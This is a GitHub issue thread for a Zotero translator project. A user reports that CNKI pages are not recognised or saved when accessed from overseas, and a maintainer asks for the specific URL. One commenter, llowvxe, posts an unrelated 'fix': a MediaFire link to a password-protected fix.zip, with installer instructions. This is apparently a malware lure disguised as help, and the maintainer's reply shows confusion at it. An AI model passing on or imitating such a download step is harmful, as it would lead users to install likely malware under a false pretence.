### ISSUE TITLE
知网使用翻译器显示 翻译器排除故障

### ISSUE THREAD

**Issue by pinkdolphin44** [l0o0/translators_CN#377]
**你遇到了什么问题？** [必填]
- [  ✔] 无法识别条目
- [✔ ] 无法保存条目
- [ ] 无法下载附件
- [] 缺少字段、字段错误
- [ ] 其他

**发生问题的链接** [必填]
https://www.cnki.net/

**问题描述** [必填]
如：知网使用翻译器显示 翻译器排除故障

**你的预期结果**
如：“作者”名字应该分开。

**浏览器**

- [✔ ] Chrome（谷歌浏览器）
- [ ] FireFox（火狐浏览器）
- [✔] Edge
- [ ] Safari
- [ ] 其他

**自查清单**
- [✔] 我已经按照[教程](https://zotero-chinese.com/user-guide/faqs/update-translators.html)将翻译器更新到最新版
- [✔ ] 我尝试过重启浏览器、Zotero或电脑
- [ ] 我使用VPN访问
- [ ] 我使用校园网直接访问
- [✔ ] 我在海外访问

**附件**

![image](https://github.com/user-attachments/assets/3310de8e-202c-4374-ac0a-5ab2a35c3d3d)

**Comment by jiaojiaodubai** [comment]
知网海外版有还几个版本，请编辑上面的信息，写出你遇到问题的具体链接。

另外注意 Markdown 语法
```markdown
- [x] somthing
```
就表示勾选的复选框了。

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jiaojiaodubai** [comment]
@llowvxe ？
